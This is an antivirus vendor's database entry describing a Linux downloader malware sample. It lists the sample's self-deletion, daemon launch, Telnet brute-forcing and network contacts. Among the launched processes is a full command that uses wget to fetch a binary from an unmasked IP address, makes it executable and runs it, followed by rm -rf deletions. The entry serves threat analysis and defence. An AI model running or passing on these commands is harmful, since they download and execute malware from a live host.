Linux.DownLoader.1315
Added to the Dr.Web virus database:
2019-08-08
Virus description added:
2019-08-08
Technical Information
Malicious functions:
Removes itself
Launches itself as a daemon
Launches processes:
- sh -c wget http://34.67.138.200/dark_bins/dark.mpsl; chmod 777 *; ./dark.mpsl wget.loader.mpsl
- wget http://34.67.138.200/dark_bins/dark.mpsl
- chmod 777 dark.mpsl run.sh stdout.log
- ./dark.mpsl wget.loader.mpsl
- sh -c rm -rf hmpsl
- rm -rf hmpsl
Performs operations with the file system:
Modifies file access rights:
- /root/dark.mpsl
- /root/run.sh
Creates or modifies files:
Deletes files:
Network activity:
Establishes connection:
- 8.#.8.8:53
- 34.##.138.200:1791
Attacks using a special dictionary (brute-force technique) via the Telnet protocol.
HTTP GET requests:
- 34.##.###.200/dark_bins/dark.mpsl
Sends data to the following servers:
- 34.##.138.200:1791
- 67.###.48.237:23
- 10#.#21.5.97:23
- 16#.##2.139.153:23
Receives data from the following servers:
Curing recommendations
Linux
Free trial
One month (no registration) or three months (registration and renewal discount)
欢迎下载
Dr.Web for Android
-
免费3个月
-
可使用所有保护组件
-
可在AppGallery/Google Pay延期
继续使用此网站意味着您同意我们使用Cookie文件和其他用于收集网站访问统计信息的技术手段。详细信息